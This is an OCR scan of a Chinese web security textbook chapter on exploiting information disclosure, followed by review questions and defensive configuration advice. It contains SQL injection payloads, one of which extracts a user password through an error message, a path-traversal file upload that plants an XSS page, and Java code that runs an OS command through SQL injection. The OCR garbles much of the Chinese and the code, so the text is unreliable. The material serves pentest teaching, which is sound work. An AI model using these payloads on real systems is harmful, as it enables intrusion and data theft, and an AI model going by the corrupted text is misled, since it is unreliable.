上 县。 如 果 发 生 完全 无 法 处 理 的 错误 ， 应 用 程序 通 带 会 返回 一 个 HTTP 500 状 态 码 ， 而 且 响 应 主体 
中 也 包括 其 他 与 错误 有 关 的 信息 。 其 他 依 况 下 , 应 用 程序 会 对 错误 进行 适当 处 理 ,并 回 用 户 返 回 
一 条 定制 消息 ， 其 中 有 时 还 包括 后 端 组 件 生 成 的 错误 信息 。 在 某 些 情况 下 ,信息 披露 本 身 可 能 被 
攻击 者 当做 攻击 手段 。 应 用 程序 通常 会 在 调试 消息 或 异常 错误 中 无 意 披露 信息 ,因此 组 织 的 安全 
规程 可 能 会 完全 忽略 这 种 信息 披露 。 

我 们 将 在 以 下 几 节 中 讲 到 ， 利 用 应 用 程序 返回 的 消息 ， 攻 击 者 可 以 实施 一 系列 其 他 攻击 。 

e000D0UUUUUUUUO 

在 针对 服务 器 后 端 组 件 实施 特定 攻击 时 , 这 些 组 件 在 遇 到 错误 时 常常 会 提供 直接 反馈 。 渗透 
测试 员 可 以 利用 这 些 反 馈 对 攻击 进行 调整 。 数 据 库 错误 消息 中 通 第 包含 有 用 的 信息 。 例 如 , 它们 
通常 会 披露 造成 错误 的 查询 ， 渗 透 测试 员 可 以 将 其 用 于 优化 SQL 注 入 攻击 。 

Failed to retrieve row with statement - SELECT object data FROM 


deftr.tblobject WHERE object_ 1Q = ‘FDJE0Q0012’: AND project iQ = ‘FOO! 

and 1=2-—! 

请 参阅 第 9 草 了 解 如 何 实施 数据 库 攻 击 ， 并 根据 错误 消息 提取 信息 的 详细 方法 。 

sD0000UUD0UUUDU0 

如 第 12 章 所 述 , 针对 跨 站 点 脚本 的 安全 防御 是 一 个 艰巨 的 任务 , 需要 确定 用 户 提 交 的 数据 的 
每 一 个 输出 位 置 。 虽 然 大 多 数 框架 在 报告 错误 时 都 会 对 数据 进行 HTML 编 码 ， 但 并 不 是 所 有 框架 
都 这 样 做 。 错 误 消 息 常 常 在 HTTP 啊 应 中 的 非常 规 位 置 多 次 出 现 。 在 Tomcat 使 用 的 HttpServlet- 
Response.sendqError () 调 用 中 ， 错 误 数 据 还 是 啊 应 消息 头 的 一 部 分 : 

HTTP/1.1 500 General Error Accessing Doc10083011 

Server: Apache-Coyote/1.1 

Content-Type: text/html;charset=ISO-8859-1 

Content-Length: 1105 


Date: Sat, 23 Apr 2011 08:52:15 GMT 
Connection:; close 


如 末 拥 有 对 输入 字符 串 poc10083011 的 控制 权 ， 攻 击 者 就 可 以 提 区 换行 字符 并 实施 HTTP 消 
县 头 注 和 攻击， 或 在 HTTP 啊 应 中 实施 览 站 点 脚本 攻击 。 有 关 详 细 信息 ， 请 访问 以 下 链接 : 

http:/www.securityfocus.com/archive/1/495021/100/0/threaded 

通常 ， 定 制 错误 消息 主要 发 送 到 控制 台 等 非 HTML 目 标 , 但 有 时 用 户 可 以 在 HTTP 响 应 中 发 
现 这 类 错误 显示 的 消息 。 在 这 些 情 况 下 ， 攻 击 者 就 可 以 轻松 实施 器 站 点 脚本 攻击 。 

euUUUUUDUUUo 

我 们 在 第 11 章 中 的 示例 讲 到 ， 利 用 应 用 程序 意外 显示 的 “加 密 提 示 ”， 可 以 解密 以 加 蜜 格式 
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器用 户 显 示 的 字符 串 。 信 息 披 露 也 会 叶 致 同样 的 问题 。 在 第 7 鞋 的 示例 中 ， 某 应 用 程序 提供 

用 于 文件 访问 的 加 密 下 载 链接 。 如 采 某 个 文件 已 被 移 走 或 删除 ,应 用 程序 会 报告 无 法 下 ee 
当然 ， 错误 消 息 中 包含 了 该 文件 的 解密 值 ， 因 此 ， 可 以 回 该 下 载 链接 提供 任何 加 密 的 “文件 名 ”， 
从 而 导致 错误 。 

在 这 种 情况 下 , 信息 披露 是 由 刻意 滥用 反馈 造成 的 。 如 果 对 参数 进行 解密 ,然后 将 其 用 在 各 
种 也 数 中 ,只 要 其 中 的 任何 函数 会 记录 数据 或 生成 错误 消 且 , 则 这 时 导致 的 信息 披露 往往 更 具 偶 
发 性 。 例 如, 笔者 曾 遇 到 一 个 复杂 的 工作 流程 应 用 程序 , 该 应 用 程序 使 用 通过 客户 并 传送 的 加 密 
参数 。 如 果 将 dbid 和 grouphome 的 默认 值 互 换 ， 应 用 程序 将 返回 以 下 错误 : 


Java.sGq1L.SOLExXcepticon: Listener refused the connection with the 
following error: ORA-12505, TNS:1listener does not currently know 
































of SID given in connect descriptor The Connection descriptor used 
by the client was: 172.16.214.154:1521:docs/londonoffice/2010/general 


这 上 段 消息 提供 i 时 。 具 体 来 说 ，qbiq 实 际 上 是 Oracle 数 据 库 的 连接 的 加 密 SID 
( 连接 描述 符 采 用 “服务 器 :端口 :SID” 的 形式 )，grouphome 则 为 加 密 的 文件 路 径 。 

在 以 下 与 许多 其 [他 信 息 披 露 攻击 类 似 的 攻击 中 了 解 文件 路 径 为 攻击 者 提供 了 实施 文件 路 径 
操纵 攻击 所 需 的 信息 。 在 文件 名 中 提供 3 个 路 径 裔 历 字 符 ， 并 同上 导航 类 似 的 目录 结构 ， 就 可 以 
直接 癌 其 他 组 的 工作 空间 上 传 包含 恶意 代码 的 文件 : 


POST /dashboard/utils/fileupload HTTP/1.1 
Accept: text/htm], application/xhtm]l+xml, */* 
Referer: http://wahh/dashboard/common/newnote 
































ACCept-Language: en-GB 

Content-Type:; multipart/form-data; boundary=------ 7db3d439b04c0 
Accept-Encoding: gzip, deflate 

Host: wahh 

Content-Length: 8088 

Proxy-Connection: Keep-Alive 


一 一 一 一 一 一 一 一 7db3d439b04c0 
Content-Disposition: form-data; name="MAX FILE SIZE" 


100000 

-一 一 一 一 一 一 一 1db3d439b04c0 

Content-Disposition: form-data; name="uploadedfile"; filename="../../../ 
newportoffijce/20]0/general/xss.html]l" 

Content-Type: text/html 

<html><body><script>... 


渗透 秀 测试 步骤 











(1) 当 通 过 在 不 同 的 参数 中 提交 专门 设计 的 攻击 学 符 串 ,探查 应 用 程序 中 是 否 存在 常见 的 
痪 洞 时 ， 应 始终 监控 应 用 程序 的 啊 应 ， 以 确定 任何 可 能 包含 有 用 信息 的 错误 消 居 。 


458 第 1$ 章 ”利用 信息 泄露 





尝试 通 过 在 错误 的 情况 下 提交 加 密 数据 字符 串 ,或 通过 对 未 处 于 处 理 操作 的 正确 状态 的 次 
源 执行 操作 ， 强 制 应 用 程序 返回 钳 误 啊 应 。 

(2) 注意 ， 在 服务 需 啊 应 中 返回 的 错误 消息 可 能 不 会 在 浏览 需 中 显示 。 因 此 ， 确 定 错误 条 
件 的 有 将 方法 ， 是 在 每 一 个 原始 啊 应 中 查找 经 党 出 现在 错误 消息 中 的 关键 字 。 例 如 : 
illegal 
工科 al 了 
Rl 
stack 
0 
file 
no fouwmad 
varchar 
ODBC 
SOL 
SELECT 

(3) 在 基本 请 求 中 发 送 一 系列 修改 参数 的 请 求 时 ， 为 避免 错误 警报 ， 应 检查 最 初 的 请 求 是 
否 已 经 包含 任何 正在 寻找 的 关键 字 。 

(4) 可 以 使 用 Burp Intruder 中 的 Grep 困 数 迅速 确定 在 由 某 个 攻击 生成 的 任何 啊 应 中 出 现 的 
有 用 的 关键 字 ( 请 参阅 第 14 蔓 了解 相关 内 容 )。 如 有 果 发 现 匹 配 的 关键 字 , 应 手动 检查 相关 啊 应 ， 


确定 应 用 程序 是 否 返回 任何 有 用 的 错误 信息 。 








DODODUODDUOUUOUUUOUUU 

















提示 “查看 浏览 器 中 的 服务 器 的 响应 时 要 注意 ， 默 认 情 况 下 ，Internet Explorer 会 隐 


ey 藏 许多 错误 消息 ， 并 用 一 个 第 规 页 面 代替 它们 。 可 以 选择 “工具 ”一 “JInternet 选 项 ” 
(Tools 一 Internet Options )， 然 后 在 “高 级 ”( Advanced ) 选项 卡 中 禁用 这 种 行为 。 





15.1.5 ”使 用 公共 信息 


由 于 Web 应 用 程序 通常 会 采用 大 量 各 不 相同 的 技术 与 组 件 ， 因此 渗透 测试 员 经 第 会 遇 到 一 些 
以 前 从 未 见 过 的 错误 消息 ,它们 可 能 不 会 立即 揭示 应 用 程序 中 出 现 的 错误 的 本 质 。 在 这 种 情况 下 ， 
可 以 从 各 种 公共 资源 获得 更 多 与 错误 消息 有 关 的 信息 。 

通常 ， 不 常见 的 错误 消息 往往 是 由 某 个 特定 的 API 故 障 造 成 的 。 对 消息 文本 进行 搜索 就 可 以 
找到 这 个 API 的 文档 资料 或 开发 者 论坛 ， 以 及 讨论 这 个 问题 的 其 他 位 置 。 

许多 应 用 程序 采用 第 三 方 组 件 执行 一 些 常见 的 任务 ,如 搜索 、 购 物 饶 和 站 点 反馈 功能 。 这 些 
组 件 生成 的 任何 错误 消息 可 能 已 经 出 现在 其 他 应 用 程序 中 ， 并 被 人 们 在 其 他 地 方 讨 论 。 

一 些 应 用 程序 中 合并 了 公开 发 布 的 源 代 码 。 通 过 搜索 出 现在 不 常见 错误 消息 中 的 一 些 特 丈 的 
表达 式 ， 就 可 以 找到 实际 执行 相关 功能 的 源 代 码 。 然 后 检查 这 些 代 码 ， 了 解 它 们 对 输入 执行 了 何 
种 处 理 以 及 如 何 操纵 应 用 程序 ， 从 而 对 某 个 漏洞 加 以 利用 。 
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渗透 测试 步 又 


(1) 使 用 标准 搜索 引擎 搜索 任何 不 稼 见 的 错误 消息 的 文本 。 可 以 使 用 各 种 高 级 搜索 特性 缩 





小 搜索 范围 ， 例 如 : 
"unable to retrieve" filetype:php 


(2) 检查 搜索 结果 ， 寻 找 所 有 关于 错误 消 朋 的 讨论 以 及 其 他 出 现 相 同 消 有 息 的 站 点 。 其 他 应 
用 程序 生成 的 同一 条 错误 消息 可 能 更 详细 , 有 助 于 更 好 地 了 人 解 错误 条 件 。 使 用 搜索 引擎 缓存 获 
取 不 再 出 现在 当前 应 用 程序 中 的 错误 消 筷 。 

(3) 使 用 Google 代 人 码 搜索 查找 任何 生成 特定 错误 消息 的 、 公 开发 布 的 代码 。 搜 索 可 能 被 便 
编码 到 应 用 程序 源 代码 中 的 错误 消 朋 代码 段 。 还 可 以 使 用 各 种 高 级 搜索 特性 指定 代码 语言 及 其 
他 已 知 的 细 市 ， 例 如 : 

unable\ to\ retrieve lang:php package:mail 

(4) 如 有 果 获 得 了 包含 库 与 第 三 方 代码 组 件 名 称 的 栈 奶 中 ,在 上 述 两 种 搜索 引擎 中 搜索 这 些 
名 称 。 


























15.1.6 ”制造 详尽 的 错误 消息 


有 些 情况 下 渗透 测试 员 可 以 系统 性 地 制造 错误 条 件 ， 以 获取 错误 消息 中 的 敏感 信息 。 

假如 能 让 应 用 程序 对 一 个 特殊 的 数据 执行 菜 种 无 效 的 操作 , 就 可 能 出 现 上 述 情况 。 如 来 生成 
的 错误 消息 揭示 该 数据 的 值 ,就 可 以 让 应 用 程序 以 这 种 方式 处 理 有 用 的 信息 ,然后 利用 这 种 行为 
从 应 用 程序 中 提取 任意 数据 。 

可 以 在 SQL 注 入 攻击 中 利用 详尽 的 开放 式 数 据 库 连 接 (ODBC ) 错误 请 恩 检 过 任意 数据 库 查 
询 的 结果 。 例 如 ， 如 采 将 以 下 SQL 注 入 wHERE 子 句 中 ， 将 导致 数据 库 将 用 户 表 中 第 一 个 用 户 的 密 
码 转 换 为 整数 ， 以 执行 求 值 操作 : 

! and l={(select password from users where uid=1)-—- 

这 会 导致 以 下 详细 的 错误 消息 : 
Error: Conversion failed when converting the varchar value 
'3ICRICCAYS3085900R4D6A35P288PB587ACDBBO0841'" Lo Qatd type int. 



































尝试 访问 : 
http://mdsec.net/addressbook/32 


此 外 ,如 采 某 个 应 用 程序 错误 生成 一 个 包含 错 谋 摘 述 的 栈 奶 踊 , 就 可 以 利用 这 种 技巧 制造 一 
种 情形 ， 让 应 用 程序 将 有 用 的 信息 合并 到 错误 摘 述 中 。 

一 些 数据 库 允 许 用 户 创建 用 Java 编 写 的 日 定义 函数 。 在 这 种 情况 下 ， 渗透 测试 员 可 以 利用 一 
个 SQL 注入 漏洞 创建 目 己 的 函数 ， 执 行 任意 任务 。 如 果 应 用 程序 癌 浏 览 融 返回 错误 消息 ， 就 可 以 
让 创建 的 函数 生成 一 个 包含 任何 想 要 的 数据 的 异 肖 。 例 如 ， 下 面 的 代码 将 运行 操作 系统 命令 1s， 
然后 生成 一 个 包含 命令 输出 结果 的 异常 。 它 将 癌 浏 览 带 返回 一 个 栈 追 踪 , 其 中 第 一 行 包含 一 个 日 
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录 列 表 : 
ByteArrayOutputstream baos = new ByteArrayOutpeutstream!()}): 
try 
. 
Process p = Runtime.getRuntime{() .exec{("l1s"); 


InputSstream is = p.getIinputSstream!(); 
int cc: 
Wiile {=1 I Te 8.Te0d{))) 
baos .write( (byte) c);: 
} 


catch (Exception e) 
{ 
} 


throw new RuntimeException(new String(baos.toByteArray()}): 


15.2 ”收集 公布 的 信息 


除 在 错误 消息 中 泄露 有 用 的 信息 外 ， Web 应 用 程序 直接 公布 的 信息 也 是 它 披露 敏感 数据 的 男 
-个 主要 源头 。 由 于 以 下 原因 ， 应 用 程序 可 能 会 公布 对 攻击 者 有 利 的 信息 。 

口 公布 的 信息 在 设计 上 属于 应 用 程序 核心 功能 的 一 部 分 。 

口 公布 的 信息 会 无 意 中 给 其 他 功能 造成 负面 影响 。 

口 由 仍然 存在 于 当前 应 用 程序 中 的 调试 功能 泄露 信息 。 

口 由 于 某 个 漏洞 ( 如 访问 控制 不 完善 ) 而 导致 信息 泄露 。 

应 用 程序 可 能 向 用 户 公布 的 敏感 信息 通常 包括 以 下 几 项 。 

口 有 效用 户 名 、 账 号 与 文档 ID 列表 。 

口 用 户 个 人 资料 ， 包 括 用 户 角 色 与 权限 、 最 后 登录 日 期 与 账户 状态 。 

口 用 户 当 前 使 用 的 密码 ( 该 密码 在 屏幕 上 隐藏 显示 ,但 却 出 现在 页 面 源 代码 中 )。 

口 包含 在 日 志文 件 中 的 信息 ， 如 用 户 名 、URL、 执 行 的 操作 、 会 话 令 牌 与 数据 库 查 询 。 

口 客户 端 HTML 源 代码 中 与 应 中 用 程序 有 关 的 细 市 , 如 作为 注释 处 理 的 链接 或 表单 字段 以 及 关 

于 漏洞 的 注释 。 












































渗透 秀 测试 步 

(1) ee 中 得 到 的 结果 ( 请 参阅 第 4 章 了 解 相关 内 容 ), 确定 可 用 于 获取 
有 用 信息 的 所 有 服务 带 端 功能 与 客户 端 数 据 。 

(2) 在 应 用 程序 中 确定 服务 顺 癌 浏览 希 返 回 密 但 或 信用 卡 资料 等 敏感 数据 的 所 有 位 置 。 即 

















使 这 些 信息 在 屏幕 上 隐藏 显示 , 但 仍然 可 以 在 服务 需 的 啊 应 中 看 到 这 些 信 息 。 如 果 发 现 其 他 适 
当 的 漏洞 , 例如 访问 控制 或 会 话 处 理 方面 的 漏洞 , 就 可 以 利用 这 种 行为 获取 属于 其 他 应 用 程序 
用 户 的 信息 。 

(3) 如 果 已 经 确定 任何 提取 敏感 信息 的 方法 , 请 使 用 第 14 章 描述 的 技巧 自动 攻击 解析 过 程 。 
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15.3 ”使 用 推论 
有 些 情况 下 , 应 用 程序 可 能 不 会 直接 泄露 任何 数据 , 但 可 以 根据 它 的 行为 准确 推断 出 有 用 的 








在 探查 其 他 类 型 漏洞 的 过 程 中 ,我 们 已 经 遇 到 过 许多 以 这 种 方式 泄露 信息 的 情况 ,如 下 所 示 。 
口 注册 功能 允许 在 选择 已 经 存在 的 用 户 名 时 根据 出 现 的 错误 消息 枚 举 出 已 注册 的 用 户 名 。 
口 搜索 引擎 允许 推 新 出 未 获 授 权 就 可 直接 查看 的 编 入 索引 的 文档 内 容 〈 请 参阅 第 11 章 了 解 
相关 内 容 )。 
口 在 育 目 SQL 注入 漏洞 中 , 可 以 通过 给 一 个 现 有 的 查询 增加 一 个 二 进 制 条 件 , 一 次 一 位 地 提 
取信 息 〈 请 参阅 第 9 章 了 解 相 关内 容 )。 
口 .NET 中 的 “填充 提示 ”攻击 ， 在 这 种 攻击 中 ,攻击 者 可 以 通过 向 服务 如 发 送 一 系列 请 求 ， 
并 观察 哪些 请 求 在 解密 期 间 导 致 错误 ， 从 而 解密 任何 字符 串 〈 请 参阅 第 18 章 )。 
另外 , 根据 某 种 对 攻击 者 有 利 的 事实 ， 如 有 条 应 用 程序 执行 不 同 操作 所 用 的 时 间 各 不 相同 , 那 
， 应 用 程序 行为 上 的 这 种 细微 差异 也 会 导致 信息 泄露 。 这 种 差异 由 以 下 原因 造成 。 
口 许多 复 末 的 大 型 应 用 程序 需要 从 数据 库 、 消 息 队 列 与 大 型 主机 等 后 端 系 统 中 提取 数据 。 
为 提高 性 能 ， 一 些 应 用 程序 缓存 频 迷人 使 用 的 信息 。 同 样 ， 一 些 应 用 程序 采用 一 种 延迟 加 
载 ( lazy load ) 模式 ， 仅 在 需要 时 加 载 对 象 和 数据 。 在 这 种 情况 下 ， 应 用 程序 会 从 服务 大 
的 本 地 绥 存 中 迅速 提取 出 最 近 访 问 的 数据 ， 而 从 相关 后 端 系 统 中 相对 缓慢 地 提取 出 其 他 
数据 。 
电子 银行 应 用 程序 常常 以 这 种 方式 运作 , 与 活动 账户 相 比 , 访问 一 个 休 虐 账户 通常 需要 更 
长 的 时 间 ; 这 时 ,技巧 熟练 的 攻击 者 就 可 以 利用 这 种 行为 枚 举 出 其 他 用 户 最 近 访 问 的 账户 。 
口 有 些 时 候 ， 应 用 程序 人 处理 某 个 特殊 请 求 所 花 的 时 间 取 决 于 用 户 提 交 的 数据 是 否 有 效 。 例 
如 ， 如 有 果 问 登录 机 制 提交 一 个 有 效 的 用 户 名 ， 应 用 程序 就 会 执行 各 种 数据 库 查 询 ， 获 取 
账户 信息 并 更 新 审计 日 六， 同时 执行 需要 进行 大 量 计算 的 操作 ， 根 据 保存 的 散 列 确认 用 
户 提交 的 密码 。 如 果 攻 击 者 能 够 探测 到 这 种 时 间 差 异 ， 他 就 能 利用 它 枚 举 有 效 的 用 户 名 。 
口 一 些 应 用 程序 可 能 会 根据 用 户 输入 执行 一 项 操作 。 如 采用 户 提 交 的 某 个 数据 无 效 ， 就 会 
造成 超时 。 例 如 ， 如 果菜 应 用 程序 使 用 cookie 保 存 一 个 前 端 负 和 载 均衡 右 ( load balancer ) 
之 内 的 主机 地 址 , 攻击 者 就 可 以 操纵 这 个 地 址 , 扫描 组 织 内 部 网 络 中 的 Web 服 务 器 。 如 果 
提交 的 服务 融 地 址 不 属于 应 用 程序 基础 设施 的 范围 ， 应 用 程序 就 会 立即 返回 一 个 错误 。 
如 采 提 交 一 个 不 存在 的 地 址 ， 那 么 尝试 连接 这 个 地 址 就 会 造成 超时 ， 然 后 应 用 程序 再 返 
回 与 上 一 种 情况 相同 的 常规 错误 。 攻击 者 可 以 利用 Burp Intruder 结 采 表 中 的 啊 应 计时 带 进 
行 这 种 测试 。 注 意 ， 默 认 情 况 下 这 些 列 隐藏 不 可 见 ， 但 可 通过 Columns 采 单 显 示 。 
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渗透 测试 步 又 
(1) 应 用 程序 响应 时 间 上 的 差异 可 能 非常 微小 ， 难 以 探测 。 通 常 ， 只 有 在 向 关键 区 域 提交 
重要 的 数据 以 及 所 执行 的 处 理 很 可 能 会 导致 时 间 差异 时 ， 才 值得 在 应 用 程序 中 探查 这 种 行为 。 
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(2) 为 测试 某 个 特殊 的 功能 ， 编辑 两 个 列表 ， 其 中 分 别 包 含 几 个 已 知 有 效 (或 最 近 被 访问 ) 
的 数据 和 已 知 无 效 (或 休眠 状态 ) 的 数据 。 以 可 控制 的 方式 提出 包括 这 两 个 列表 中 的 每 一 个 数 
据 的 请 求 ,一 次 仅 提 出 一 个 请 求 , 然后 监控 应 用 程序 响应 每 个 请 求 所 用 的 时 间 。 确定 数据 的 状 
态 与 响应 时 间 之 间 是 否 存 在 任何 关联 。 

(3) 可 以 使 用 Burp Intruder 自 动 完成 这 项 任务 。 对 于 每 一 个 生成 的 请 求 ，Intruder 将 自动 记 
录 应 用 程序 响应 前 所 用 的 时 间 以 及 完成 响应 所 用 的 时 间 。 还 可 以 按 这 些 属性 对 结果 表 进 行 分 
类 ， 迅 速 确 定 明 显 关联 。 














15.4 ”防止 信息 泄露 


虽然 我 们 不 可 能 或 无 法 完全 阻止 泄露 对 攻击 者 有 用 的 信息 ,但 可 以 采取 各 种 相对 简单 的 措 
施 ， 最 大 限度 地 减少 信息 泄露 ,防止 将 最 敏感 的 数据 泄露 给 攻击 者 ,避免 应 用 程序 的 安全 造成 严 
重 破坏 。 


15.4.1 使 用 串 规 错误 消息 


应 禁止 应 用 程序 癌 用 户 的 浏览 带 返 回 详尽 的 错误 消 朋 或 调试 信息 。 如 果 发 生 无 法 预料 的 错误 
( 如 数据 库 查 询 错 误 、 磁盘 文件 读 取 故障 或 外 部 API 调 用 异常 ), 应 用 程序 应 返回 相同 的 常规 消息 ， 
通知 用 户 出 现 错误 。 如 有 末 因 为 文 持 或 诊断 目的 而 有 必要 记录 调试 信息 , 那么 将 这 些 信息 保存 在 一 
个 用 户 无 法 公开 访问 的 服务 硕 端 日 志 中 , 并 在 必要 时 癌 用 户 返回 相关 日 志 记 录 的 索引 号 ,方便 他 
们 在 联系 服务 合 时 报告 这 个 错误 。 

可 以 配置 大 多 数 应 用 程序 平台 与 Web 服 务 硕 ， 使 其 拦截 错误 消息 ， 不 将 它 返 回 给 浏览 硕 。 

口 在 ASPNET 中 , 可 以 使 用 web .config 文 件 的 customErrors 元 素 , 通过 设置 mode 属 性 为 
on 或 RemoteOnly, 并 在 defaultRedirec t 廊 点 指定 一 个 定制 错误 页 面 ， 从 而 阻止 详尽 
的 钳 误 消 县 。 

口 在 Java Platform 中 ， 可 以 使 用 web.xml 文 件 的 error-page 元 素 配 置 定制 错误 消息 。 
exception-type 节 点 可 用 于 指定 -Ls Java 异 第 类 型 ， 或 者 使 用 srror-codae 节 点 指定 
一 个 HTTP 状 态 码 ; 使 用 locationT 点 可 设 定 发 生 错 误 时 显示 的 定制 页 面 。 

口 在 Microsoft IIS 中 ， 可 以 使 用 一 个 Web 站 点 属性 页 面 的 “定制 错误 ”( Custom Errors ) 选项 
卡 ， 为 不 同 的 HTTP 状 态 人 码 指 定 定制 错 误 页 面 。 如 有 必要 ， 可 在 每 个 目录 的 基础 上 为 每 个 
状态 人 码 设置 一 个 不 同 的 定制 页 面 。 

口 在 Apache 中 ， 可 以 使 用 httpd.conf 中 的 Errorpocument 指 令 配 置 定制 错误 页 面 。 例 如 : 


ErrorDocument 500 /generalerror.html 
15.4.2 ”保护 敏感 信息 
只 要 有 可 能 ,应 禁止 应 用 程序 公布 对 攻击 者 有 用 的 信息 ,包括 用 户 名 、 日志 记录 或 用 户 个 人 
























































13.6 ”问题 403 


资料 。 如 果 菏 些 用 户 需 要 访问 这 些 信息 ,应 使 用 访问 控制 对 它们 进行 有 效 保护 ,并且 只 有 在 完全 
必要 时 才 提 供 这 些 信 息 。 

如 条 必 须 癌 授权 用 户 透 露 敏感 信息 〈 例 如 ， 以 便 用 户 更 新 他 们 的 账户 信息 )， 那 么 在 不 必要 
时 也 不 得 披露 现 有 数据 。 例如, 应 以 答 短 的 形式 显示 保存 的 信用 卡号 , 绝 不 能 预先 填写 密码 字段 ， 
即使 它 在 屏 考 上 隐藏 显示 。 这 些 防御 措施 有 助 于 减轻 验证 、 会 话 管理 与 访问 控制 等 应 用 程序 核心 
安全 机 制 中 存在 的 严重 汤 洞 造成 的 影响 。 




















15.4.3 ”尽量 减少 客户 端 信 息 泄 露 


只 要 有 可 能 ,应 删除 或 修改 服务 着 标 ， 避 人 免 泄 露 特定 软件 版 本 等 信息 。 执 行 这 种 防御 所 需 的 
步 又 依 应 用 程序 所 使 用 的 技术 而 定 。 例 如 ， 在 Microsoft IIS 中 ， 可 以 使 用 HSLockDown 工 具 中 的 
URLScan 删 除 servez 消 息 头 。 在 最 新 版 本 的 Apache 中 ,使 用 mogd_headers 模 块 可 达到 相同 的 目 
的 。 由 于 这 些 信息 会 随时 改变 ， 建 议 在 进行 任何 修改 之 前 查阅 服务 器 上 的 文档 资料 。 

另外 ， 还 应 删除 部 署 在 当前 生产 环境 中 的 客户 端 代 码 ( 包括 全 部 HTML 与 JavaScript 代码 ) 
中 的 所 有 注释 。 

还 要 特别 注意 任何 厚 客 户 端 组 件 ， 如 Javaapplet 和 ActiveX 控件 。 不 得 在 这 些 组 件 中 包含 任 
何 敏感 信息 。 技 术 熟 练 的 攻击 者 能 够 破译 或 逆 癌 制造 这 些 组 件 ， 恢 复 它 们 的 源 代码 ( 请 参阅 第 
章 了 解 相关 内 容 )。 























15.5 ”小结 


泄露 不 必要 的 信息 通常 不 会 对 应 用 程序 的 安全 造成 严重 影响 。 有 时 , 即使 是 非常 详细 的 栈 扎 
蹊 与 其 他 再 试 消息 ， 也 不 会 为 攻击 应 用 程序 提供 很 大 帮助 。 

然而 ,在 其 他 情况 下 ,渗透 测试 员 可 能 会 发 现 非常 有 利于 实施 攻击 的 信息 来 源 ,， 例如 ,它们 
披露 了 用 户 名 列表 、 软 件 组 件 的 准 硝 版 本 ， 或 者 泄露 服务 天 站 应 用 程序 逻辑 的 内 部 结构 与 功能 。 

为 此 , 要 对 应 用 程序 实施 严重 的 攻击 , 渗透 测试 员 必 须 对 应 用 程序 目 身 及 公开 资源 进行 仔细 
的 核查 ,收集 有 助 于 发 动 攻击 的 信息 。 有 些 时 候 攻 击 者 能 够 以 这 种 方式 收集 的 信息 为 起 点 ， 攻破 
泄露 信息 的 应 用 程序 。 























15.6 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh。 

(1) 当 探 查 SQL 注 入 漏洞 时 ， 如 果 请 求 以 下 URL: 
https://wahh-app.com/list.aspx?artist=foo'+having+1%3d1-- 
将 会 收 到 如 下 错误 消息 : 


Server: Msg 170, Level 15, State 1, Line 1 
Line 1:; Incorrect syntax near havingl'. 
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从 中 可 以 得 出 什么 结论 ”应 用 程序 中 包含 任何 可 被 利用 的 条 件 吗 ? 
(2) 当 对 各 种 参数 进行 模糊 测试 时 ， 应 用 程序 返回 以 下 错误 消息 : 


Warning: mysgl connect(}) [function.mysgql-connect|]: Access denied for 
USer 'premiumdde'@'localhost' (using password: YES) in 
/home/doau/public html/premiumdde/directory on line 15 

Warning: mysgql_ select db(}) [function.mysgql-select-dbl: Access denied 
for user 'nobody'@'localhost' (using password: NO} in 
/home/doau/public htiml/premiumdde/directory on line 16 

Warning: mysgql select db() [function.mysgql-select-db]: A link to 

the server could not be established in 

/home/doau/public html/premiumdde/directory on line 16 

Warning: mysgl_ gquery(} [function.mysgql-gquery]: Access denieqd for 
USer 'nobody'@'localhost’' (using password: NO) in 

/home/doau/public html/premiumdde/directory on line 448 


从 中 可 以 获得 哪些 有 用 的 信息 ? 
(3) 在 解析 应 用 程序 的 过 程 中 ， 在 服务 器 上 发 现 了 一 个 激活 目录 列表 的 隐藏 目录 ， 其 中 似乎 
保存 春 大 量 以 前 用 过 的 脚本 。 请 求 其 中 一 个 脚本 返回 以 下 错误 消息 : 


CGIWTrap Error: Execution of this script not permitted 








Execution of {contact.pl1l) is not permitted for the following reason: 
Script is not executable. Issue 'chmod 755 filename' 


Local Information and Documentation: 
CGIWrap Docs: http://wahh-app.com/cgiwrap-docs/ 
Contact EMail: helpdesk@wahh-app.com 


SErver Data: 

Server Administrator/Contact: helpdesk@wahh-app.com 
Server Name: wahh-app.com 

Server Port: 80 


Server Protocol: HTTPE/1.1 
Request Data: 


User Agent/Browser: Mozil]la/4.0 (compatible; MSIE 7.0; Windows NT 
5.1; .NET CLR 2.0.50727; FDM; InfopPath.1; .NET CLR 1.1.4322) 
Request Method: GET 

Remote Address: 192.168.201].19 

Remote Port: 57961] 

Referring Page: http://wahh-app.com/cgi-bin/cgiwrap/fodd 


是 什么 原因 造成 了 这 个 错误 ”可 以 立即 发 现 哪 些 和 常见 的 Web 应 用 程序 漏洞 ? 

(4) 在 探查 一 个 请 求 参 数 的 功能 并 试图 确定 它 在 应 用 程序 中 的 作用 时 ， 如 果 请 求 以 下 URL: 
https://wahh-app.com/agents/checkcfg.php?name=admin&1id=13&log=1 

应 用 程序 将 返回 以 下 错误 消息 : 


Warning: mysgl] connect{() [function.mysgql-connect]: Can't connect to 
MySOL server on 'admin' (10013) in 


/var/local/www/include/dbconfig.php on line 23 











这 条 错误 消息 是 由 什么 原因 造成 的 ? 为 此 应 探查 什么 漏洞 ? 

(5) 当 模糊 测试 一 个 请 求 ， 看 其 否 存在 各 种 漏洞 时 ， 测 试 员 轮 流 在 每 个 请 求 参 数 中 提交 
了 一 个 单 引 号 。 其 中 一 个 请 求 的 啊 应 包含 了 一 个 HTTP 500 状 态 码 ， 表 示 应 用 程序 可 能 存在 SQL 
注入 漏洞 。 消 息 的 全 部 内 容 如 下 : 


Microsoft VBScript runtime error :800a000Q2: 











Type mismatch: ” [string: "1"]' 
/scripts/confirmOrder.asp, line 715 


该 应 用 程序 是 否 易于 受到 攻击 ? 














攻击 本 地 编译 型 应 用 程序 





\- 十 去 , 在 本 地 执行 环境 中 运行 的 编 详 型 软件 一 是 受到 绥 冲 区 次 出 己 格式 化 学 符 串 ( format 
string ) 等 漏洞 的 困扰 。 如 今 ， 绝 大 多 数 的 Web 应 用 程序 都 是 使 用 在 托管 执行 环境 中 运 
行 的 语言 和 平台 编写 的 , 这 个 环境 中 不 存在 上 述 典型 漏洞 。 使 用 C# 和 Java 这 类 语言 的 一 个 主要 优 
点 在 于 , 程序 员 不 必 上 再 担心 缓冲 区 管理 与 指针 算法 等 问题 ; 这 些 问题 曾 给 以 本 地 语言 ( 如 C 和 C++ ) 
开发 的 软件 造成 重大 影响 ， 并 且 是 这 些 软件 中 绝 大 多 数 严 重 独 洞 的 根源 所 在 。 
